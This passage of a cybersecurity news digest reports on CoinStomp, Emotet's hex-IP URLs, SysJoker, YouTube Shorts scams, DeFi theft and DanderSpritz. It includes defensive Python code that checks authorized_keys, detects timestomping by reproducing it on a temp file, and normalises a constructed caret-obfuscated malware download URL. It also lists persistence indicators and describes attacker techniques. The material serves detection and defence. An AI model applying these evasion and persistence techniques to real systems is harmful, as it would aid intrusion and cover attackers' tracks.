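# Constructed authorized_keys content (placeholder key blobs, not real keys):
# two operator keys, one with a leading options field, and one foreign key.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyForAlice alice@ops-laptop
# backup host, restricted
from="10.0.0.5",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyForBackup backup@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExampleWormKey root@unknown
"""

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def unexpected_keys(authorized_keys_text, allowed):
    """Return the authorized_keys lines whose (key type, base64 blob) pair is
    not in `allowed`, a set of such pairs. Handles the optional quoted
    options field that may precede the key type."""
    found = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)             # keeps quoted options as one token
        while parts and not parts[0].startswith(KEY_TYPE_PREFIXES):
            parts.pop(0)                      # drop the options field, if any
        if len(parts) < 2:
            continue
        if (parts[0], parts[1]) not in allowed:
            found.append(line)
    return found


if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_AUTH_LOG))
    allowed = {("ssh-ed25519", "AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyForAlice"),
               ("ssh-ed25519", "AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyForBackup")}
    print(unexpected_keys(SAMPLE_AUTHORIZED_KEYS, allowed))
```

In production the allow list would be the keys your configuration management deploys, and the log source would be the sshd journal; the point of the key check is that a P2P worm that installs its own public key leaves a line in authorized_keys that no operator can account for.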

CoinStomp Malware is Aimed at Asian Cloud Service Providers

 

Researchers have uncovered a new malware family that mines cryptocurrencies using cloud services. According to Cado Security, the malware, dubbed CoinStomp, is comprised of shell scripts that "try to target cloud compute instances hosted by cloud service providers for the purpose of mining cryptocurrencies." According to the company's researchers, the overall goal of CoinStomp is to silently breach instances in order to harness computational resources to illicitly mine for cryptocurrency, a type of attack known as cryptojacking. 

So far only a handful of attacks have been observed, all targeting cloud service providers in Asia. Clues in the code also reference Xanthe, a cryptojacking group previously linked to the Abcbot botnet; however, that clue, found in a defunct payload URL, is insufficient to attribute CoinStomp and may have been planted in an "attempt to dodge attribution", the team says. 

CoinStomp has several noteworthy features. One is its use of "timestomping": altering the timestamps of files dropped or used during an attack. It is an anti-forensics technique meant to confuse investigators and hamper remediation. Although the Rocke group has used timestomping in earlier cryptojacking campaigns, it is not a common technique. On Linux it takes nothing more than the -t flag of the touch command, which sets a file's access and modification times to an arbitrary value. 

"It seems likely that timestomping was employed to obfuscate usage of the chmod and chattr utilities, as forensic tools would display the copied versions of these binaries as being last accessed (executed) at the timestamp used in the touch command," Cado Security noted. 
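The weakness of touch-style timestomping is that touch -t (and the os.utime() call behind it) can rewrite a file's access and modification times but not its inode change time: the kernel sets ctime to the current clock on that very metadata update and exposes no user-space API to set it back. The following added example, written for this page and not taken from Cado Security, reproduces the stomp on a temporary file and then detects it by looking for a modification time far older than the change time. The file names and the 2009 date are constructed.

```python
"""Added example (not Cado Security's code): reproduce `touch -t` style
timestomping on a temp file, then detect it from the mtime/ctime gap.
Linux semantics are assumed: os.utime() sets atime and mtime, ctime is
updated to 'now' by the kernel and cannot be set from user space."""
import os
import tempfile
import time


def timestomp(path, epoch_seconds):
    """Backdate atime and mtime, exactly what `touch -t YYYYMMDDhhmm` does."""
    os.utime(path, (epoch_seconds, epoch_seconds))


def timestomp_suspects(paths, min_gap_seconds=60):
    """Return the paths whose ctime is later than mtime by at least
    min_gap_seconds. A normal write bumps mtime and ctime together; a large
    gap means mtime was rewritten after the last real content change."""
    suspects = []
    for path in paths:
        st = os.stat(path)
        if st.st_ctime - st.st_mtime >= min_gap_seconds:
            suspects.append(path)
    return suspects


def demo():
    """Create two fresh files, backdate one to 2009 (a copied `chmod`, as in
    the CoinStomp report), and return what the detector flags."""
    workdir = tempfile.mkdtemp(prefix="stomp-demo-")
    honest = os.path.join(workdir, "honest.sh")
    stomped = os.path.join(workdir, "chmod")      # constructed file name
    for path in (honest, stomped):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
    backdated = time.mktime((2009, 1, 1, 0, 0, 0, 0, 0, -1))   # constructed date
    timestomp(stomped, backdated)
    return timestomp_suspects([honest, stomped])   # -> [".../chmod"]


if __name__ == "__main__":
    for path in demo():
        st = os.stat(path)
        print(f"{path}: mtime={time.ctime(st.st_mtime)} ctime={time.ctime(st.st_ctime)}")
```

From a shell, `stat -c '%y %z' FILE` shows the same modification/change pair. The check is not bulletproof: an attacker with root can defeat it by moving the system clock before touching the file or by writing to the block device directly, so treat the mtime/ctime gap as one signal to correlate with process execution logs and package-manager file hashes rather than as proof on its own.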

The malware also tampers with the cryptographic policies of Linux servers. Because these system-wide policies can prevent malicious executables from being dropped or run, CoinStomp includes an option to disable them via a kill command. "This could undo attempts to harden the target machine by administrators, ensuring that the malware achieves its objectives," the researchers say. 

CoinStomp then opens a reverse shell to its command-and-control (C2) server. The script downloads and runs additional payloads as system-wide systemd services with root privileges, including binaries that may be used to install backdoors and a customised build of XMRig, legitimate Monero mining software that is widely abused for criminal purposes.

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection

 

Trend Micro has observed Emotet spam campaigns that use hexadecimal and octal representations of IP addresses in their download URLs to evade pattern-matching detection. Both campaigns rely on social engineering to trick users into enabling document macros, which then run the malware automatically. When such a URL is requested, the operating system's address parser silently converts the unusual notation to the familiar dotted-decimal form before the connection to the remote server is made, so the download works even though the URL never contains a conventional-looking IP address.

Users and enterprises are advised to detect and block these campaigns and enable the appropriate security measures, since Emotet is used to deliver second-stage malware such as TrickBot and Cobalt Strike. 

Emotet first surfaced in 2014 as a relatively simple banking Trojan distributed via phishing emails. Over the years it evolved into a Malware-as-a-Service botnet, selling access to compromised computers to anyone willing to pay. There was no shortage of buyers, including ransomware gangs such as Ryuk and the operators of the data-stealing malware TrickBot, who used the initial access Emotet provided to pick and choose which victims to hit with follow-on payloads. 

According to Europol, Emotet's ability to move laterally between devices on a network made it one of the most resilient pieces of malware seen in recent years. It has consistently ranked among the top ten campaigns detected, and according to the US Department of Justice it infected over 1.6 million victim machines. 

The samples begin with an email-attached document that uses Excel 4.0 macros, a legacy feature for automating repetitive tasks in Excel that threat actors have repurposed to deliver malware. Here the document runs the malware through an auto-open macro as soon as it is opened. The download URL in the command line is obfuscated with carets, and its host portion is a hexadecimal representation of the IP address. 

When the macro runs it launches cmd.exe, which in turn invokes mshta.exe with the hex-IP URL as its argument; mshta.exe then downloads and executes HTML Application (HTA) code from the remote host. 
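Any detection that matches on a dotted-decimal indicator misses these URLs unless the host is normalised first. The following added example, written for this page and not Trend Micro's code, strips the cmd.exe caret obfuscation and converts the host using the same rules the classic inet_aton() address parser applies (0x prefix is hex, a leading 0 is octal, and one to four dotted components are accepted), so a blocklist lookup sees the canonical address. It is written in pure Python rather than calling the platform resolver so it behaves identically everywhere. The URLs and addresses below are constructed samples, not captured campaign data.

```python
"""Added example (not Trend Micro's code): de-caret an mshta-style URL and
canonicalise hex/octal/integer IP hosts to dotted decimal. Implements the
inet_aton() parsing rules in pure Python so results do not depend on the
host platform's resolver."""
import re

HOST_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^/:?#]+)")


def strip_carets(s):
    """cmd.exe treats ^ as an escape character, so h^tt^p^:/^/ is http:// once parsed."""
    return s.replace("^", "")


def _parse_part(tok):
    """One dotted component, with C strtoul-style base detection."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", tok):
        return int(tok, 16)
    if re.fullmatch(r"0[0-7]*", tok):          # leading zero: octal ("0" alone is 0)
        return int(tok, 8)
    if re.fullmatch(r"[1-9][0-9]*", tok):
        return int(tok, 10)
    raise ValueError(f"not an inet_aton component: {tok!r}")


def inet_aton_to_dotted(host):
    """Canonicalise any inet_aton()-accepted form to a.b.c.d, or return None
    when `host` is not such a form (for example a DNS name).
      a        -> one 32-bit value
      a.b      -> a is 8 bits, b fills the remaining 24
      a.b.c    -> a and b are 8 bits, c fills the remaining 16
      a.b.c.d  -> four 8-bit parts"""
    try:
        parts = [_parse_part(t) for t in host.split(".")]
    except ValueError:
        return None
    widths = {1: [32], 2: [8, 24], 3: [8, 8, 16], 4: [8, 8, 8, 8]}.get(len(parts))
    if widths is None:
        return None
    value = 0
    for n, w in zip(parts, widths):
        if n >= (1 << w):                        # component too large for its slot
            return None
        value = (value << w) | n
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalize_url_host(url):
    """Return (de-careted URL, canonical host). Non-IP hosts are returned as-is."""
    clean = strip_carets(url)
    m = HOST_RE.match(clean)
    if not m:
        return clean, None
    host = m.group(1)
    return clean, inet_aton_to_dotted(host) or host


def is_blocked(url, blocklist):
    """Blocklist match on the canonical host rather than the raw URL text."""
    return normalize_url_host(url)[1] in blocklist


if __name__ == "__main__":
    # Constructed sample in the style of the campaign's caret-obfuscated command line.
    sample = "h^tt^p^:/^/0xb907d607/fer/fer.html"
    print(normalize_url_host(sample))          # ('http://0xb907d607/fer/fer.html', '185.7.214.7')
    print(inet_aton_to_dotted("0056.0151.0121.0114"))   # 46.105.81.76
```

The same normalisation belongs in proxy and DNS-log parsing: matching `0xb907d607`, `3104298503` and `185.7.214.7` as one indicator is what defeats the evasion, whereas adding each spelling to a signature just invites the next encoding.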

Between November and December 2021, Emotet was seen indiscriminately dropping Cobalt Strike beacons; this year its operators have been noticeably more selective about which hosts receive them. Evasion tricks like the change of IP notation show that the attackers continue to innovate against pattern-based detection, and the atypical hexadecimal and octal addresses may slip past existing solutions that rely on matching dotted-decimal patterns.

SysJoker, a New Backdoor for Windows, macOS, and Linux has been Discovered

 

A new multi-platform backdoor dubbed 'SysJoker' has been found in the wild, targeting Windows, Linux and macOS and evading detection on all three. SysJoker was first identified during an active attack on a well-known educational institution's Linux-based web server.

Further investigation showed that SysJoker also exists in Mach-O (macOS) and Windows PE versions. Based on C2 domain registration dates and samples uploaded to VirusTotal, the researchers believe the campaign began in the second half of 2021. 

SysJoker masquerades as a system update and obtains its C2 address by decoding a string from a text file hosted on Google Drive. The C2 changed three times during Intezer's analysis, indicating that the attacker was active and monitoring infected machines. 

Based on victimology and the malware's behaviour, Intezer believes SysJoker is aimed at specific targets. The sample was uploaded to VirusTotal with the TypeScript file extension .ts, so an infected npm package is one possible infection vector. 

The malware is written in C++. Although each variant is tailored to its target operating system, none of them was detected by any of the 57 antivirus engines on VirusTotal at the time of analysis. On Windows, SysJoker uses a first-stage dropper DLL that runs PowerShell commands to fetch the SysJoker ZIP from a GitHub repository, unzip it into "C:\ProgramData\RecoverySystem\" and execute the payload. 

The malware then sleeps for up to two minutes before creating a new directory and copying itself there as an Intel Graphics Common User Interface Service ("igfxCUIService.exe"). "Next, SysJoker will gather information about the machine using Living off the Land (LOtL) commands. SysJoker uses different temporary text files to log the results of the commands," explains Intezer's report. "These text files are deleted immediately, stored in a JSON object and then encoded and written to a file named 'microsoft_Windows.dll'." 

The report includes detailed indicators of compromise (IOCs) that administrators can use to detect the presence of SysJoker on an infected device. 

On Windows, the malware files are located under the "C:\ProgramData\RecoverySystem" folder, at C:\ProgramData\SystemData\igfxCUIService.exe, and C:\ProgramData\SystemData\microsoft_Windows.dll. On Linux, the files and directories are created under “/.Library/” while persistence is established by creating the following cron job: @reboot (/.Library/SystemServices/updateSystem). On macOS, the files are created on "/Library/” and persistence is achieved via LaunchAgent under the path: /Library/LaunchAgents/com.apple.update.plist.

Stolen TikTok Videos have Infiltrated YouTube Shorts

 

Scammers are taking full advantage of the launch of YouTube Shorts, Google's TikTok competitor, which has proven an excellent platform for pushing stolen content to billions of engaged viewers. Researchers warn that this content is being used to run rackets such as promoting adult dating websites, hawking diet pills and selling marked-up goods. Although YouTube Shorts is still in beta, scammers have had plenty of time to port their best TikTok-tested cons over to Google's platform and its audience of billions. 

Satnam Narang, a Tenable analyst who has studied social media scams for over a decade, found that scammers are having great success stealing TikTok's most viral videos and reposting them on YouTube Shorts to lure viewers into clicking assorted sites and links. Narang examined 50 YouTube channels and found that, as of December, they had accumulated 3.2 billion views across at least 38,293 videos stolen from TikTok creators, with more than 3 million subscribers between them. 

The most common type of fraud Narang discovered was the use of extremely popular TikTok videos, especially challenges showing gorgeous women, to serve links to adult dating sites that run affiliate programmes that pay for clicks.

These sites pay affiliates on a cost-per-action (CPA) or cost-per-lead (CPL) basis. Scammers abuse those affiliate programmes by duping social media users: all they need is for a visitor to reach the adult dating site and sign up with an email address, valid or not. Each such registration counts as a CPL conversion worth roughly $2 to $4 to the fraudster. 

“While adult-dating scams proliferate across many platforms, the introduction of YouTube Shorts, with its enormous potential reach and built-in audience, is fertile ground that will only serve to help these scams become even more widespread,” Narang explained. “This trend is alarming because of how successful these tactics have become so quickly on YouTube Shorts, based on the volume of video views and subscribers on these fake channels promoting stolen content.” 

Viewers of YouTube Shorts were also served ads built around viral TikTok exercise videos for trending products such as the pants social media dubbed "the leggings". The famous leggings, with a seam across the back designed to flatter even the flattest posterior, were being sold at a markup by scammers betting that the new audience would not notice the padded price, Narang found.

According to Chainalysis, Around $2.2 Billion was Stolen from DeFi Protocols in 2021

 

Chainalysis, a blockchain data platform, has issued a new report on cryptocurrency crime patterns, revealing that $14 billion in cryptocurrency was sent to unlawful addresses in 2021, nearly doubling the level observed in 2020. However, those figures do not tell the entire story. 

The use of cryptocurrencies is growing faster than ever. Total transaction volume across all cryptocurrencies tracked by Chainalysis reached $15.8 trillion in 2021, up 567% from 2020. Given that rapid adoption, it is no surprise that more criminals are using cryptocurrency too. 

Chainalysis data shows that around $2.2 billion was stolen directly from DeFi protocols in 2021. As of early 2022, Chainalysis estimates that illicit addresses hold at least $10 billion in cryptocurrency, most of it in wallets associated with theft, darknet markets and scams.  

Chainalysis researchers found that scammers took 82% more in 2021 than the year before, raking in $7.8 billion in cryptocurrency from victims. Of that, $2.8 billion came from "rug pulls", in which developers build seemingly legitimate cryptocurrency projects and then abscond with investors' funds. 

"We believe rug pulls are common in DeFi for two related reasons. One is the hype around the space. DeFi transaction volume grew 912% in 2021, and the incredible returns on decentralized tokens like Shiba Inu have many excited to speculate on DeFi tokens," Chainalysis said. "At the same time, it's very easy for those with the right technical skills to create new DeFi tokens and get them listed on exchanges, even without a code audit. Many investors could likely have avoided losing funds to rug pulls if they'd stuck to DeFi projects that have undergone a code audit – or if DEXes required code audits before listing tokens." 

According to Chainalysis, many of last year's high-profile attacks on DeFi platforms "may be linked back to errors in the smart contract code governing those protocols, which hackers exploit to steal funds." 

The year-end attack on the DeFi protocol Grim Finance capped a turbulent year for DeFi hacks. A week earlier, more than $77 million was stolen from AscendEX, and a few days before that the blockchain gaming startup Vulcan Forged reported that over $140 million had been stolen from its users. 

Cybercriminals stole over $120 million from the DeFi platform Badger in November. Other 2021 incidents include the theft of about $600 million from Poly Network in August, $34 million from Cream Finance in September and around $200 million from PancakeBunny in May.

Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers

 

Researchers have published a detailed look at DoubleFeature, a component dedicated to logging the various stages of post-exploitation that follow the Equation Group's deployment of DanderSpritz, a full-featured malware framework. 

DanderSpritz came to light on April 14, 2017, when the hacker group known as The Shadow Brokers published a dump titled "Lost in Translation" that included the framework among other tools. The same leak contained EternalBlue, an exploit developed by the US National Security Agency (NSA) that threat actors later used to spread the NotPetya ransomware across unpatched Windows machines. 

DanderSpritz is a modular, stealthy, fully functional post-exploitation framework for Windows and Linux that relies on dozens of plugins. One of them is DoubleFeature, which acts as a "diagnostic tool for victim machines carrying DanderSpritz", according to a new paper released Monday by Check Point researchers. 

The Israeli cybersecurity firm added, "DoubleFeature could be used as a sort of Rosetta Stone for better understanding DanderSpritz modules, and systems compromised by them. It's an incident response team's pipe dream." 

DoubleFeature is a Python-based dashboard that doubles as a reporting utility, exfiltrating logging information from an infected system to an attacker-controlled server. It is designed to keep track of which tools have been deployed on a target machine. A dedicated executable, "DoubleFeatureReader.exe", is used to interpret its output. 

Among the plugins DoubleFeature tracks are the remote access tools UnitedRake (aka EquationDrug) and PeddleCheap, a stealthy data-exfiltration backdoor called StraitBizarre, an espionage platform called KillSuit (aka GrayFish), a persistence toolset named DiveBar, a covert network-access driver called FlewAvenue, and a validator implant named MistyVeal that checks whether the compromised system is a genuine victim rather than a research environment. 

The researchers stated, "Sometimes, the world of high-tier APT tools and the world of ordinary malware can seem like two parallel universes." 

"Nation-state actors tend to [maintain] clandestine, gigantic codebases, sporting a huge gamut of features that have been cultivated over decades due to practical need. It turns out we too are still slowly chewing on the 4-year-old leak that revealed DanderSpritz to us, and gaining new insights."